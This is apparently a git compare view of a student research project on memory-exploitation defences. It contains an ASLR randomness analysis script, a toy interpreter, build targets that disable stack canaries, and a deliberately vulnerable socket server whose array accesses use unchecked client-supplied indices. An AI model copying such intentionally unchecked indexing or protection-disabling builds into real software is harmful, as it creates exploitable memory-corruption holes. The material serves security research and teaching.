Compare commits
22 commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 1dfc8318bf | |||
| 78c21f45ee | |||
| 2733800f4d | |||
|
7734aea2d2 | ||
| 0fa10f44a9 | |||
| 791facef81 | |||
| 83ace6d5af | |||
| 32cd3068f3 | |||
| 239e8ba670 | |||
| f3d2022c2e | |||
| c5103eda57 | |||
| 6399fbda0f | |||
| de7e4a2bd3 | |||
| f3f0dd37d9 | |||
| 28f538eb52 | |||
| 4396bda1cf | |||
| 13c05b02a3 | |||
|
472741b134 | ||
|
|
d4cb2e4b18 | ||
| 17fb756143 | |||
| 5134979c68 | |||
|
cc77b3be08 |
47 changed files with 22311 additions and 411 deletions
1
.gitignore
vendored
1
.gitignore
vendored
|
|
@ -1,3 +1,4 @@
|
|||
serveur
|
||||
client
|
||||
attaque
|
||||
lib/test
|
||||
36
AnalyseStat/main.py
Normal file
36
AnalyseStat/main.py
Normal file
|
|
@ -0,0 +1,36 @@
|
|||
import pandas as pd
|
||||
import numpy as np
|
||||
import matplotlib.pyplot as plt
|
||||
|
||||
#path à modifier en fonction de qui execute
|
||||
pathASLR = "/Users/nahombelay/Documents/GitINSA/PIR/outputASLR.csv"
|
||||
pathWithoutASLR = "/Users/nahombelay/Documents/GitINSA/PIR/outputWithoutASLR.csv"
|
||||
df_ASLR = pd.read_csv(pathASLR)
|
||||
#df_ASLR = df_ASLR.head()
|
||||
df_WithoutASLR = pd.read_csv(pathWithoutASLR)
|
||||
#df_WithoutASLR = df_WithoutASLR.head()
|
||||
|
||||
#convert hex strings to integers (not hex because takes too long)
|
||||
for column in df_ASLR.columns:
|
||||
df_ASLR[column] = df_ASLR[column].apply(lambda x: int(x, 16))
|
||||
df_WithoutASLR[column] = df_WithoutASLR[column].apply(lambda x: str(x))
|
||||
df_WithoutASLR[column] = df_WithoutASLR[column].apply(lambda x: int(x, 16))
|
||||
|
||||
df_ASLR["offsetCodeAddr"] = df_ASLR["startStackAddr"] - df_ASLR["startCodeAddr"]
|
||||
df_ASLR["offsetLibAddr"] = df_ASLR["startStackAddr"] - df_ASLR["startLibAddr"]
|
||||
|
||||
df_WithoutASLR["offsetCodeAddr"] = df_WithoutASLR["startStackAddr"] - df_WithoutASLR["startCodeAddr"]
|
||||
df_WithoutASLR["offsetLibAddr"] = df_WithoutASLR["startStackAddr"] - df_WithoutASLR["startLibAddr"]
|
||||
|
||||
if __name__ == '__main__':
|
||||
fig, axs = plt.subplots(3, 2)
|
||||
|
||||
df_ASLR["startStackAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[0, 0], grid=False, rot=0)
|
||||
df_ASLR["offsetCodeAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[1, 0], grid=False, rot=0)
|
||||
df_ASLR["offsetLibAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[2, 0], grid=False, rot=0)
|
||||
df_WithoutASLR["startStackAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[0, 1], grid=False, rot=0)
|
||||
df_WithoutASLR["offsetCodeAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[1, 1], grid=False, rot=0)
|
||||
df_WithoutASLR["offsetLibAddr"].value_counts().value_counts().plot(kind='bar', ax=axs[2, 1], grid=False, rot=0)
|
||||
|
||||
plt.show()
|
||||
|
||||
11
Interpreteur/input.txt
Normal file
11
Interpreteur/input.txt
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
AFC 0 1
|
||||
AFC 10 20
|
||||
ADD 0 0 10
|
||||
AFC 1 8888
|
||||
SUP 2 0 1
|
||||
JMF 2 7
|
||||
PRI 1
|
||||
PRI 0
|
||||
CALL
|
||||
COPR
|
||||
RET
|
||||
14
Interpreteur/makefile
Executable file
14
Interpreteur/makefile
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
SRCC:= ./src/*.c
|
||||
|
||||
all: interpreter
|
||||
|
||||
interpreter: ./src/interpreter.y ./src/interpreter.l ./src/instructions.c
|
||||
yacc -d ./src/interpreter.y
|
||||
lex ./src/interpreter.l
|
||||
gcc lex.yy.c y.tab.c ./src/instructions.c -Isrc -o interpreter
|
||||
|
||||
run: interpreter
|
||||
./interpreter < input.txt
|
||||
|
||||
clean:
|
||||
rm -f lex.yy.c interpreter y.tab.h y.tab.c *.o
|
||||
8
Interpreteur/src/.idea/.gitignore
vendored
Normal file
8
Interpreteur/src/.idea/.gitignore
vendored
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
# Default ignored files
|
||||
/shelf/
|
||||
/workspace.xml
|
||||
# Datasource local storage ignored files
|
||||
/dataSources/
|
||||
/dataSources.local.xml
|
||||
# Editor-based HTTP Client requests
|
||||
/httpRequests/
|
||||
8
Interpreteur/src/.idea/modules.xml
Normal file
8
Interpreteur/src/.idea/modules.xml
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<project version="4">
|
||||
<component name="ProjectModuleManager">
|
||||
<modules>
|
||||
<module fileurl="file://$PROJECT_DIR$/.idea/src.iml" filepath="$PROJECT_DIR$/.idea/src.iml" />
|
||||
</modules>
|
||||
</component>
|
||||
</project>
|
||||
8
Interpreteur/src/.idea/src.iml
Normal file
8
Interpreteur/src/.idea/src.iml
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<module type="CPP_MODULE" version="4">
|
||||
<component name="NewModuleRootManager">
|
||||
<content url="file://$MODULE_DIR$" />
|
||||
<orderEntry type="inheritedJdk" />
|
||||
<orderEntry type="sourceFolder" forTests="false" />
|
||||
</component>
|
||||
</module>
|
||||
6
Interpreteur/src/.idea/vcs.xml
Normal file
6
Interpreteur/src/.idea/vcs.xml
Normal file
|
|
@ -0,0 +1,6 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<project version="4">
|
||||
<component name="VcsDirectoryMappings">
|
||||
<mapping directory="$PROJECT_DIR$/../.." vcs="Git" />
|
||||
</component>
|
||||
</project>
|
||||
219
Interpreteur/src/instructions.c
Executable file
219
Interpreteur/src/instructions.c
Executable file
|
|
@ -0,0 +1,219 @@
|
|||
#include <stdio.h>
|
||||
#include "instructions.h"
|
||||
|
||||
struct instruction {
|
||||
char ins;
|
||||
int arg1;
|
||||
int arg2;
|
||||
int arg3;
|
||||
};
|
||||
|
||||
struct instruction instructions[MAX_INSTRUCTIONS_SIZE];
|
||||
int current_line;
|
||||
int has_error;
|
||||
|
||||
int memory[MAX_MEMORY_SIZE];
|
||||
int memory_fonc[MAX_MEMORY_SIZE];
|
||||
|
||||
int ESP=0;
|
||||
int EBP=0;
|
||||
int INDEX_memory_fonc=0;
|
||||
|
||||
int pop_memory_fonc(){
|
||||
int res;
|
||||
if(INDEX_memory_fonc >0){
|
||||
res=memory_fonc[INDEX_memory_fonc];
|
||||
memory_fonc[INDEX_memory_fonc]=-1;
|
||||
INDEX_memory_fonc --;
|
||||
}else{
|
||||
printf("erreur pop dans la pile des adresses de retour et sauvegardes de contexte, pile déjà vide\n");
|
||||
}
|
||||
return res;
|
||||
}
|
||||
|
||||
void push_memory_fonc(int arg){
|
||||
if (INDEX_memory_fonc < MAX_MEMORY_SIZE){
|
||||
INDEX_memory_fonc ++;
|
||||
memory_fonc[INDEX_memory_fonc]=arg;
|
||||
}else{
|
||||
printf("erreur push dans la pile des adresses de retour et sauvegardes de contexte, taille excedée\n");
|
||||
}
|
||||
}
|
||||
|
||||
void print_stack(int tab[], int taille){
|
||||
for (int i=0; i<taille; i++){
|
||||
printf("tab[%d]=%d\n", i,tab[i]);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
int exec(int ip);
|
||||
int valid_memory_addr(int address);
|
||||
|
||||
/***** Public funciton *****/
|
||||
|
||||
void asm_init() {
|
||||
current_line = 0;
|
||||
has_error = 0;
|
||||
}
|
||||
|
||||
void asm_add_3(char ins, int arg1, int arg2, int arg3) {
|
||||
if (current_line >= MAX_INSTRUCTIONS_SIZE) {
|
||||
fprintf(stderr, "ERROR readfile : Too much instructions, please modify value of MAX_INSTRUCTIONS_SIZE.\n");
|
||||
has_error = 1;
|
||||
return;
|
||||
}
|
||||
|
||||
// ip are validated at runtime; memory addr are validated here
|
||||
if (ins == AFC || ins == JMF) {
|
||||
if (!valid_memory_addr(arg1)) {
|
||||
fprintf(stderr, "ERROR readfile : INVALID addr at line %d, please verify that addr is in range 0 to MAX_MEMORY_SIZE\n", current_line);
|
||||
has_error = 1;
|
||||
return;
|
||||
}
|
||||
} else if (ins == JMP) {
|
||||
// do nothing
|
||||
} else {
|
||||
if (!(valid_memory_addr(arg1) && valid_memory_addr(arg2)
|
||||
&& valid_memory_addr(arg3))) {
|
||||
fprintf(stderr, "ERROR readfile : INVALID addr at line %d, please verify that addr is in range 0 to MAX_MEMORY_SIZE\n", current_line);
|
||||
has_error = 1;
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
// When OK
|
||||
instructions[current_line].ins = ins;
|
||||
instructions[current_line].arg1 = arg1;
|
||||
instructions[current_line].arg2 = arg2;
|
||||
instructions[current_line].arg3 = arg3;
|
||||
current_line++;
|
||||
}
|
||||
|
||||
void asm_add_2(char ins, int arg1, int arg2) {
|
||||
asm_add_3(ins, arg1, arg2, 0);
|
||||
}
|
||||
|
||||
void asm_add_1(char ins, int arg1) {
|
||||
asm_add_3(ins, arg1, 0, 0);
|
||||
}
|
||||
void asm_add_0(char ins) {
|
||||
asm_add_3(ins, 0, 0, 0);
|
||||
}
|
||||
|
||||
void asm_run() {
|
||||
int ip = 0;
|
||||
if (has_error) {
|
||||
fprintf(stderr, "ERROR run : abandoned due to previous error.\n");
|
||||
return;
|
||||
}
|
||||
printf("INFO run : begin\n");
|
||||
while (ip >= 0 && ip < current_line) {
|
||||
// wait for user input
|
||||
//getchar();
|
||||
// execution
|
||||
ip = exec(ip);
|
||||
}
|
||||
printf("INFO run : end\n");
|
||||
}
|
||||
|
||||
/***** Private funciton *****/
|
||||
|
||||
int valid_memory_addr(int addr) {
|
||||
return addr >= 0 && addr < MAX_MEMORY_SIZE;
|
||||
}
|
||||
|
||||
int exec(int ip) {
|
||||
int next_ip = ip + 1;
|
||||
char ins = instructions[ip].ins;
|
||||
int arg1 = instructions[ip].arg1;
|
||||
int arg2 = instructions[ip].arg2;
|
||||
int arg3 = instructions[ip].arg3;
|
||||
printf("%d : ", ip);
|
||||
|
||||
// execute inst
|
||||
switch (ins) {
|
||||
case ADD:
|
||||
printf("ADD @%d = @%d[%d] + @%d[%d]\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] + memory[arg3+EBP];
|
||||
break;
|
||||
case MUL:
|
||||
printf("MUL @%d = @%d[%d] * @%d[%d]\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] * memory[arg3+EBP];
|
||||
break;
|
||||
case SOU:
|
||||
printf("SOU @%d = @%d[%d] - @%d[%d]\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] - memory[arg3+EBP];
|
||||
break;
|
||||
case DIV:
|
||||
printf("DIV @%d = @%d[%d] / @%d[%d]\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] / memory[arg3+EBP];
|
||||
break;
|
||||
case COP:
|
||||
printf("COP @%d = @%d[%d]\n", arg1, arg2, memory[arg2+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP];
|
||||
break;
|
||||
case AFC:
|
||||
printf("AFC @%d = %d\n", arg1, arg2);
|
||||
memory[arg1+EBP] = arg2;
|
||||
ESP+=1;
|
||||
break;
|
||||
case JMP:
|
||||
printf("JMP to %d\n", arg1);
|
||||
next_ip = arg1;
|
||||
break;
|
||||
case JMF:
|
||||
printf("JMF cond@%d[%d] to %d\n", arg1, memory[arg1+EBP], arg2);
|
||||
if (memory[arg1+EBP] == 0) next_ip = arg2;
|
||||
break;
|
||||
case INF:
|
||||
printf("INF @%d = @%d[%d] < @%d[%d] ? 1 : 0\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] < memory[arg3+EBP] ? 1 : 0;
|
||||
break;
|
||||
case SUP:
|
||||
printf("SUP @%d = @%d[%d] > @%d[%d] ? 1 : 0\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] > memory[arg3+EBP] ? 1 : 0;
|
||||
break;
|
||||
case EQU:
|
||||
printf("EQU @%d = @%d[%d] == @%d[%d] ? 1 : 0\n", arg1, arg2, memory[arg2+EBP], arg3, memory[arg3+EBP]);
|
||||
memory[arg1+EBP] = memory[arg2+EBP] == memory[arg3+EBP] ? 1 : 0;
|
||||
break;
|
||||
case PRI:
|
||||
printf("PRI @%d[%d]\n", arg1, memory[arg1+EBP]);
|
||||
break;
|
||||
case AFCA:
|
||||
printf("AFCA @[%d] = %d\n", arg1, arg2+EBP);
|
||||
memory[arg1]=arg2+EBP;
|
||||
ESP+=1;
|
||||
break;
|
||||
case WR:
|
||||
printf("WR @[@%d](%d) = @%d[%d] \n", arg1, memory[arg1], arg2, memory[arg2] );
|
||||
memory[memory[arg1]]=memory[arg2];
|
||||
break;
|
||||
case READ:
|
||||
printf("READ @%d = @%d(%d)\n", arg1, memory[arg1],memory[memory[arg1]]);
|
||||
memory[arg1]=memory[memory[arg1]];
|
||||
break;
|
||||
case CALL:
|
||||
printf("CALL memory_fonc: adr_ret=%d; context (ebp)=%d \njump to function to line %d\n", arg3, EBP, arg1);
|
||||
push_memory_fonc(arg3);
|
||||
push_memory_fonc(EBP);
|
||||
EBP=ESP+1;
|
||||
next_ip=arg1;
|
||||
break;
|
||||
case RET:
|
||||
ESP=EBP-1;
|
||||
EBP=pop_memory_fonc();
|
||||
next_ip=pop_memory_fonc();
|
||||
printf("RET return to line %d \nand update ebp to %d\n", next_ip, EBP);
|
||||
break;
|
||||
default:
|
||||
fprintf(stderr, "ERROR run : unknown inst.\n");
|
||||
}
|
||||
printf("memory_fonc\n");
|
||||
print_stack(memory_fonc, INDEX_memory_fonc);
|
||||
printf("memory\n");
|
||||
print_stack(memory, ESP);
|
||||
return next_ip;
|
||||
}
|
||||
32
Interpreteur/src/instructions.h
Normal file
32
Interpreteur/src/instructions.h
Normal file
|
|
@ -0,0 +1,32 @@
|
|||
#ifndef __INSTRUCTIONS_H__
|
||||
#define __INSTRUCTIONS_H__
|
||||
|
||||
#define ADD 1
|
||||
#define MUL 2
|
||||
#define SOU 3
|
||||
#define DIV 4
|
||||
#define COP 5
|
||||
#define AFC 6
|
||||
#define JMP 7
|
||||
#define JMF 8
|
||||
#define INF 9
|
||||
#define SUP 10
|
||||
#define EQU 11
|
||||
#define PRI 12
|
||||
#define AFCA 13
|
||||
#define WR 14
|
||||
#define READ 15
|
||||
#define RET 16
|
||||
#define CALL 17
|
||||
|
||||
#define MAX_INSTRUCTIONS_SIZE 256
|
||||
#define MAX_MEMORY_SIZE 256
|
||||
|
||||
void asm_init();
|
||||
void asm_add_3(char ins, int arg1, int arg2, int arg3);
|
||||
void asm_add_2(char ins, int arg1, int arg2);
|
||||
void asm_add_1(char ins, int arg1);
|
||||
void asm_add_0(char ins);
|
||||
void asm_run();
|
||||
|
||||
#endif // #ifndef __INSTRUCTIONS_H__
|
||||
43
Interpreteur/src/interpreter.l
Executable file
43
Interpreteur/src/interpreter.l
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
%{
|
||||
#include "y.tab.h"
|
||||
%}
|
||||
|
||||
vSEP [ \t\r\n]
|
||||
|
||||
%%
|
||||
|
||||
ADD {return tADD;}
|
||||
MUL {return tMUL;}
|
||||
SOU {return tSOU;}
|
||||
DIV {return tDIV;}
|
||||
COP {return tCOP;}
|
||||
AFC {return tAFC;}
|
||||
JMP {return tJMP;}
|
||||
JMF {return tJMF;}
|
||||
INF {return tINF;}
|
||||
SUP {return tSUP;}
|
||||
EQU {return tEQU;}
|
||||
PRI {return tPRI;}
|
||||
AFCA {return tAFCA;}
|
||||
WR {return tWR;}
|
||||
READ {return tREAD;}
|
||||
RET {return tRET;}
|
||||
CALL {return tCALL;}
|
||||
|
||||
-?[0-9]+ {
|
||||
yylval.nb = atoi(yytext);
|
||||
return tNB;
|
||||
}
|
||||
|
||||
|
||||
{vSEP} {}
|
||||
|
||||
. {
|
||||
fprintf(stderr, "ERROR lex : Unknown pattern %s", yytext);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
%%
|
||||
|
||||
int yywrap(void) { return 1; }
|
||||
//int main(int argc, char *argv[]) { while (yylex()!=0) ; return 0; }
|
||||
84
Interpreteur/src/interpreter.y
Executable file
84
Interpreteur/src/interpreter.y
Executable file
|
|
@ -0,0 +1,84 @@
|
|||
%{
|
||||
#include <stdio.h>
|
||||
#include "instructions.h"
|
||||
int yylex();
|
||||
void yyerror(char*);
|
||||
int yydebug = 1;
|
||||
extern int yylineno;
|
||||
%}
|
||||
|
||||
/* Union for yylval */
|
||||
%union {
|
||||
int nb;
|
||||
}
|
||||
|
||||
%token tADD tMUL tSOU tDIV tCOP tAFC tJMP tJMF tINF tSUP tEQU tPRI tAFCA tWR tREAD tCALL tRET
|
||||
|
||||
%token <nb> tNB
|
||||
|
||||
%%
|
||||
|
||||
%start File;
|
||||
|
||||
File:
|
||||
Instructions;
|
||||
|
||||
Instructions:
|
||||
/* epsilon */
|
||||
| Instructions Instruction
|
||||
;
|
||||
|
||||
Instruction:
|
||||
tADD tNB tNB tNB
|
||||
{asm_add_3(ADD, $2, $3, $4);}
|
||||
| tMUL tNB tNB tNB
|
||||
{asm_add_3(MUL, $2, $3, $4);}
|
||||
| tSOU tNB tNB tNB
|
||||
{asm_add_3(SOU, $2, $3, $4);}
|
||||
| tDIV tNB tNB tNB
|
||||
{asm_add_3(DIV, $2, $3, $4);}
|
||||
| tCOP tNB tNB
|
||||
{asm_add_2(COP, $2, $3);}
|
||||
| tAFC tNB tNB
|
||||
{asm_add_2(AFC, $2, $3);}
|
||||
| tJMP tNB
|
||||
{asm_add_1(JMP, $2);}
|
||||
| tJMF tNB tNB
|
||||
{asm_add_2(JMF, $2, $3);}
|
||||
| tINF tNB tNB tNB
|
||||
{asm_add_3(INF, $2, $3, $4);}
|
||||
| tSUP tNB tNB tNB
|
||||
{asm_add_3(SUP, $2, $3, $4);}
|
||||
| tEQU tNB tNB tNB
|
||||
{asm_add_3(EQU, $2, $3, $4);}
|
||||
| tPRI tNB
|
||||
{asm_add_1(PRI, $2);}
|
||||
| tAFCA tNB tNB
|
||||
{asm_add_2(AFCA, $2, $3);}
|
||||
| tWR tNB tNB
|
||||
{asm_add_2(WR, $2, $3);}
|
||||
| tREAD tNB tNB
|
||||
{asm_add_2(READ, $2, $3);}
|
||||
| tCALL tNB tNB tNB
|
||||
{asm_add_3(READ, $2, $3, $4);}
|
||||
| tRET
|
||||
{asm_add_0(RET);}
|
||||
|
||||
;
|
||||
|
||||
|
||||
%%
|
||||
|
||||
void yyerror(char* str) {
|
||||
extern int yylineno;
|
||||
fprintf(stderr, "ERROR yyparse : Line %d: %s\n", yylineno, str);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
asm_init();
|
||||
yyparse();
|
||||
printf("INFO yyparse : Parsing End\n");
|
||||
asm_run();
|
||||
return 0;
|
||||
}
|
||||
|
||||
63
Makefile
Normal file
63
Makefile
Normal file
|
|
@ -0,0 +1,63 @@
|
|||
default:
|
||||
@echo "Usage : [ 64b | 64b_nocanary | 32b | 32b_nocanary ]"
|
||||
|
||||
64b: clean_serv serv64b client attaque
|
||||
64b_nocanary: clean_serv serv64b_nocanary client attaque
|
||||
32b: clean_serv serv32b client attaque
|
||||
32b_nocanary: clean_serv serv32b_nocanary client attaque
|
||||
|
||||
attaque: attaque.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du programme ATTAQUANT #"
|
||||
@echo "######################################"
|
||||
gcc -Wall -g attaque.c -o attaque
|
||||
@echo ""
|
||||
|
||||
serv64b: serveur.c
|
||||
@echo "######################################"
|
||||
@echo "####### Compilation du SERVEUR #######"
|
||||
@echo "######################################"
|
||||
gcc -Wall -g serveur.c -o serveur
|
||||
@echo ""
|
||||
|
||||
client: client.c
|
||||
@echo "######################################"
|
||||
@echo "####### Compilation du CLIENT #######"
|
||||
@echo "######################################"
|
||||
gcc -Wall -g client.c -o client
|
||||
@echo ""
|
||||
|
||||
serv32b: serveur.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du SERVEUR en 32 bits #"
|
||||
@echo "######################################"
|
||||
gcc -Wall -g -m32 serveur.c -o serveur
|
||||
@echo ""
|
||||
|
||||
serv64b_nocanary: serveur.c
|
||||
@echo "######################################"
|
||||
@echo "# Compilation du SERVEUR sans Canary #"
|
||||
@echo "######################################"
|
||||
gcc -Wall -g -fno-stack-protector serveur.c -o serveur
|
||||
@echo ""
|
||||
|
||||
serv32b_nocanary: serveur.c
|
||||
@echo "#################################################"
|
||||
@echo "# Compilation du SERVEUR en 32 bits sans Canary #"
|
||||
@echo "#################################################"
|
||||
gcc -Wall -g -m32 -fno-stack-protector serveur.c -o serveur
|
||||
@echo ""
|
||||
|
||||
edit:
|
||||
pluma serveur.c client.c attaque.c &
|
||||
|
||||
clean_attack:
|
||||
@rm -f attaque
|
||||
|
||||
clean_serv:
|
||||
@rm -f serveur
|
||||
|
||||
clean_client:
|
||||
@rm -f client
|
||||
|
||||
clean: clean_attack clean_serv clean_client
|
||||
66
ReadMe.md
66
ReadMe.md
|
|
@ -1,24 +1,47 @@
|
|||
# Projet d'Initiation à la Recherche (PIR) | 4A-IR-SI | INSA Toulouse
|
||||
|
||||
Projet d'Initiation à la Recherche (PIR) | 4A-IR-SI | INSA Toulouse
|
||||
**Membres** :
|
||||
|
||||
NOM DU PIR
|
||||
- Léonie Gallois
|
||||
- Elies Tali
|
||||
- Yohan Simard
|
||||
- Paul Faure
|
||||
- Nahom Belay
|
||||
- Jean-Rémy Hok
|
||||
|
||||
Membres : (Noms ecrit de mémoire, check orthographe)
|
||||
- Léonie Gallois
|
||||
- Elies Tali
|
||||
- Yohan Simard
|
||||
- Paul Faure
|
||||
- Nahom Bellay
|
||||
- Jean Remi Hok
|
||||
**Tuteurs** :
|
||||
|
||||
Tuteurs :
|
||||
- Didier LeBotlan
|
||||
- Eric AlataS
|
||||
- Didier Le Botlan
|
||||
- Eric Alata
|
||||
|
||||
WARNING : TO USE THE MAKEFILE YOU MAY NEED "gcc-multilib" (sudo apt-get install gcc-multilib)
|
||||
## Compilation
|
||||
|
||||
WARNING : TO USE THE MAKEFILE YOU MAY NEED "gcc-multilib" (`sudo apt-get install gcc-multilib`)
|
||||
|
||||
### Commandes make
|
||||
|
||||
Ces commandes compileront les trois exécutables client, serveur et attaque.
|
||||
|
||||
*Note : le programme attaque est toujours compilé en 64 bits avec canary, car il n'y a pas d'utilité à le compiler autrement.*
|
||||
|
||||
#### 64bit, avec canary
|
||||
|
||||
`make 64b`
|
||||
|
||||
#### 64bit, sans canary
|
||||
|
||||
`make 64b_nocanary`
|
||||
|
||||
#### 32bit, avec canary
|
||||
|
||||
`make 32b`
|
||||
|
||||
#### 32bit, sans canary
|
||||
|
||||
`make 32b_nocanary`
|
||||
|
||||
## Principe général
|
||||
|
||||
Programmes SERVEUR et CLIENT, principe général :
|
||||
|
||||
- Le serveur : Gere un entier (init 0) En écoute sur un port passé en paramètre, des qu'une connexion arrive, il fork, traite la connexion dans le fils, le père se remet en attente
|
||||
- Gestion de la connexion : Attends une chaine de caractère du client, et, en fonction de son contenu effectue les actions adéquates
|
||||
- Chaine attendues :
|
||||
|
|
@ -33,7 +56,7 @@ Programmes SERVEUR et CLIENT, principe général :
|
|||
* Le serveur copie la chaine reçue avec le read mal fait -> risque de buffer Overflow
|
||||
* Le serveur fork, l'attaquant peut accumuler de la connaissance
|
||||
|
||||
Etapes de dévellopement :
|
||||
## Étapes de dévelopement
|
||||
|
||||
- Step 1 : FAIT
|
||||
* Le serveur : Gere le nombre de connexions, à chaque connexions, il l'affiche juste.
|
||||
|
|
@ -53,3 +76,14 @@ Etapes de dévellopement :
|
|||
* Utilité : Test du serveur dans son fonctionnement normal. Test BOF possible
|
||||
* Retour test : Serveur OK, BOF OK (detecté par le canary).
|
||||
- Step 4 : TESTER LES PREMIERES EXPLOITATIONS
|
||||
|
||||
# Statistical Analysis
|
||||
|
||||
We wanted to verify how random ASLR was so we executed our server multiple times and retried the positions of the stack, lib and code using “/proc/$pid/map”. We examined two scenarios the first one using ASLR and the second without ASLR (for reference sake).
|
||||
|
||||
|
||||
We focused on three different values: the address of the stack (first row), the offset between the stack and the code portion (second row) and the offset between stack and lib (last row). The first column corresponds to ASLR and the second without ASLR. (Had trouble adding labels to the plot and didn’t get around to doing it, sorry).
|
||||
|
||||
To have a better picture of the unique addresses and a clearer representation, we only factored in how often each value was present. Then we looked at how many times those occurrences occurred.
|
||||
|
||||
The X-axis we have the occurence and in the Y-axis how many times that occurrence occurred.
|
||||
211
Serveur.c
211
Serveur.c
|
|
@ -1,211 +0,0 @@
|
|||
/* déclaration des types de base */
|
||||
#include <sys/types.h>
|
||||
/* constantes relatives aux domaines, types et protocoles */
|
||||
#include <sys/socket.h>
|
||||
/* constantes et structures propres au domaine INTERNET */
|
||||
#include <netinet/in.h>
|
||||
/* structures retournées par les fonctions de gestion de la base de
|
||||
données du réseau */
|
||||
#include <netdb.h>
|
||||
/* pour les entrées/sorties */
|
||||
#include <stdio.h>
|
||||
/* la lib standard */
|
||||
#include <stdlib.h>
|
||||
/* pour le fork */
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
|
||||
/* pour la manipulation des strings */
|
||||
#include <string.h>
|
||||
|
||||
/* Taille du tableau d'int fourni au client */
|
||||
#define SIZE_TAB 128
|
||||
|
||||
#define NB_SEP 65
|
||||
#define NB_PAR_LIGNE 16
|
||||
|
||||
|
||||
|
||||
//printf("BEFORE: %p\n", __builtin_return_address(0));
|
||||
|
||||
void handle_sigsegv(int signum)
|
||||
{
|
||||
fprintf(stderr,"Signal SIGSEGV (%d) received : SEG FAULT\n", signum);
|
||||
_exit(0);
|
||||
}
|
||||
|
||||
int min(int a, int b) {
|
||||
if (a<b) {
|
||||
return a;
|
||||
} else {
|
||||
return b;
|
||||
}
|
||||
}
|
||||
|
||||
// affichage du nombre de connexions
|
||||
void print_nb_connexions(int nb_connexions) {
|
||||
if (nb_connexions == 1) {
|
||||
printf("Nouvelle connexion, 1ere connexion\n");
|
||||
} else if (nb_connexions == 2) {
|
||||
printf("Nouvelle connexion, 2nd connexion\n");
|
||||
} else {
|
||||
printf("Nouvelle connexion, %deme connexion\n", nb_connexions);
|
||||
}
|
||||
printf("L'adresse du nombre de connexions est : %p\n", &nb_connexions);
|
||||
}
|
||||
|
||||
void print_ligne(int * ligne, int n) {
|
||||
printf("|");
|
||||
int i;
|
||||
for (i=0; i<n; i++) {
|
||||
printf(" %d |", ligne[i]);
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
void print_sep() {
|
||||
int i;
|
||||
for (i=0; i<NB_SEP; i++) {
|
||||
printf("-");
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
void print_tab(int * tab, int n) {
|
||||
print_sep();
|
||||
int i;
|
||||
for (i=0; i<n; i+=NB_PAR_LIGNE) {
|
||||
print_ligne(&(tab[i]), min(n-i, NB_PAR_LIGNE));
|
||||
print_sep();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
// Fonction lancée a chaque fork
|
||||
void process(int sock) {
|
||||
// Tableau des datas du client
|
||||
int tab[SIZE_TAB];
|
||||
|
||||
// initialisation (tt a 0)
|
||||
int i;
|
||||
for (i=0; i<SIZE_TAB; i++) {
|
||||
tab[i] = 0;
|
||||
}
|
||||
|
||||
int quit = 0;
|
||||
|
||||
while (quit == 0) {
|
||||
// récupération de l'input du client
|
||||
char buff[40] = "\0";
|
||||
read(sock, buff, 40);
|
||||
|
||||
char what;
|
||||
int param1;
|
||||
int param2;
|
||||
int param3;
|
||||
|
||||
sscanf(buff, "%c.%d.%d.%d", &what, ¶m1, ¶m2, ¶m3);
|
||||
printf("%c.%d.%d.%d\n", what, param1, param2, param3);
|
||||
if (what == 'r') {
|
||||
char buff_envoi[40];
|
||||
sprintf(buff_envoi, "%d", tab[param1]);
|
||||
send(sock, buff_envoi, strlen(buff_envoi), 0);
|
||||
} else if (what == 'w') {
|
||||
tab[param2] = param1;
|
||||
} else if (what == 'a') {
|
||||
tab[param1] = tab[param2] + tab[param3];
|
||||
} else if (what == 's') {
|
||||
tab[param1] = tab[param2] - tab[param3];
|
||||
} else if (what == 'm') {
|
||||
tab[param1] = tab[param2] * tab[param3];
|
||||
} else if (what == 'd') {
|
||||
tab[param1] = tab[param2] / tab[param3];
|
||||
} else if (what == 'l') {
|
||||
if (tab[param1] < tab[param2]) {
|
||||
send(sock, "1", 1, 0);
|
||||
} else {
|
||||
send(sock, "0", 1, 0);
|
||||
}
|
||||
} else if (what == 'e') {
|
||||
if (tab[param1] == tab[param2]) {
|
||||
send(sock, "1", 1, 0);
|
||||
} else {
|
||||
send(sock, "0", 1, 0);
|
||||
}
|
||||
} else if (what == 'p') {
|
||||
print_tab(tab, SIZE_TAB);
|
||||
} else {
|
||||
quit = -1;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
